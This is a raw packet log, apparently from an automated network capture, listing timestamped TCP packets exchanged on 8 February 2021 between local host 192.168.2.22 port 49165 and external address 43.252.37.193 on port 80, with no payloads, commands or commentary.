Feb 8, 2021 06:39:07.751120090 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.751137972 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.751164913 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.751180887 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.751220942 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.956129074 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.956193924 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.956223965 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.956263065 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.956300974 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.956341028 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.956384897 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.956469059 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.956518888 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.957923889 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.161139011 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.161195040 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.161214113 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.161237001 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.161241055 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.161279917 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.161282063 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.161320925 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.161334038 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.161360979 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.161370039 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.161426067 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.162208080 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.162256002 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.369621992 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.369688034 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.369729042 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.369771004 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.369810104 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.369860888 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.370032072 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.370079041 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.370085001 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.370090961 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.370136976 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.574521065 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.574559927 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.574589014 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.574605942 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.574620008 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.574631929 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.574680090 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.574711084 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.779093027 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.779151917 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.779182911 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.779211998 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.779242992 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.779282093 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.779409885 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.779500008 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.779509068 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.779511929 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.779515028 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.779517889 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.984278917 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.984347105 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.984407902 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.984452009 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.984493971 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:08.984657049 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.984741926 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.984754086 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.984759092 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:08.984764099 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:09.189475060 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:09.189532995 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:09.189574957 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:09.189610958 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:09.189682961 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:09.189937115 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:09.189975977 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:09.190015078 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:09.190038919 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:09.190045118 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:09.396919012 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:09.396980047 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:09.397030115 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:09.397036076 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:09.397058010 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:09.397087097 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:09.397115946 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:09.397140980 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:09.397141933 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:09.397197962 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:09.606245041 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:09.606306076 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:09.606353045 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:09.606358051 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:09.606378078 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:09.606405973 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:09.606410980 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:09.606451988 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:09.606472015 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:09.606530905 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:09.813870907 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:09.813931942 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:09.813976049 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:09.814008951 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:09.814038992 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:09.814043999 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:10.018699884 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:10.018757105 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:10.018795013 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:10.018954992 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:10.018989086 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:10.018991947 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:10.226259947 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:10.226320028 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:10.226358891 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:10.226406097 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:10.226506948 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:10.226540089 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:10.226577997 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:10.226581097 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:10.433207035 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:10.433270931 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:10.433314085 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:10.433490992 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:10.640505075 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:10.640564919 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:10.640602112 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:10.640641928 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:10.640702009 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:10.640736103 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:10.847270012 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:10.847332954 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:10.847374916 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:10.847409010 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:10.847444057 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:10.847446918 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:11.053992033 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:11.054044962 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:11.054083109 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:11.054111004 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:11.258546114 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:11.258619070 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:11.258661985 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:11.258817911 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:11.258843899 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:11.258846045 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:11.461409092 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:11.461725950 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:11.463170052 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:11.463408947 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:11.666549921 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:11.666640997 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:11.667676926 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:11.667743921 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:11.667778969 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:11.667800903 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:11.871268034 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:11.871545076 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:11.872004986 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:11.872100115 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:11.872184992 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:11.872236967 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:12.081448078 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:12.081509113 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:12.081561089 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:12.081598043 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:12.081676960 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:12.082305908 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:12.287661076 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:12.287717104 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:12.287758112 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:12.287888050 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:12.287919044 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:12.492377996 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:12.492439985 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:12.492479086 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:12.492516994 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:12.492707968 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:12.699054956 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:12.699120045 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:12.699157953 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:12.699161053 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:12.699182987 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:12.699207067 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:12.699212074 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:12.699255943 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:12.906349897 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:12.906414032 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:12.906439066 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:12.906451941 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:12.906462908 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:12.906490088 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:12.906492949 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:12.906532049 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:13.111619949 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.111680984 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.111721039 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.111758947 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.111795902 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:13.111824036 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:13.316598892 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.316673040 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.316706896 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.316747904 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.316788912 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.316828012 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.316869020 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:13.316899061 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:13.521478891 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.521507978 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.521524906 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.521543980 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.521560907 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.521579027 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.521594048 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:13.521622896 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:13.521627903 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:13.726197958 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.726255894 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.726294041 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.726331949 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.726373911 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.726413012 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:13.726423979 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.726435900 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:13.726471901 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:13.933468103 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.933548927 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.933566093 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:13.933597088 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:13.933604002 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.933645964 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:13.933655024 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.933711052 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.933713913 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:13.933753967 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:13.933763981 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:13.933808088 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.138179064 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.138284922 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.138336897 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.138350010 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.138392925 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.138396025 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.138462067 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.138505936 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.138541937 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.138581038 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.138602972 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.138643026 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.138669968 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.138717890 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.138740063 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.138780117 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.345864058 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.345942020 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.345998049 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.346059084 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.346065044 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.346086979 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.346091032 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.346113920 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.346117973 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.346163988 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.346175909 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.346220016 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.346229076 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.346272945 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.346280098 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.346322060 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.550905943 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.550985098 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.551040888 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.551049948 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.551073074 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.551074982 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.551094055 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.551135063 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.551146030 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.551182032 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.551203012 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.551244020 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.551254988 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.551291943 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.551306009 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.551342964 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.758048058 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.758147001 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.758263111 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.758296013 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.758516073 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.758563042 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.758582115 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.758604050 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.758615971 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.758645058 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.758647919 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.758683920 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.758687973 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.758728027 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.758732080 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.758776903 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.841809034 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.965318918 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.965440035 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.965482950 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.965497971 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.965533018 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.965539932 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.965543032 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.965583086 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.965596914 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.965622902 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:14.965636969 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:14.965671062 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.046530008 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.046633959 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.172571898 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.172645092 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.172655106 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.172688961 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.172688961 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.172729015 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.172729969 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.172769070 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.172770977 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.172810078 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.172811031 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.172848940 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.172852039 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.172893047 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.380408049 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.380480051 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.380510092 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.380542994 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.380573034 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.380616903 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.380665064 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.380702972 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.380759001 CET	80	49165	43.252.37.193	192.168.2.22
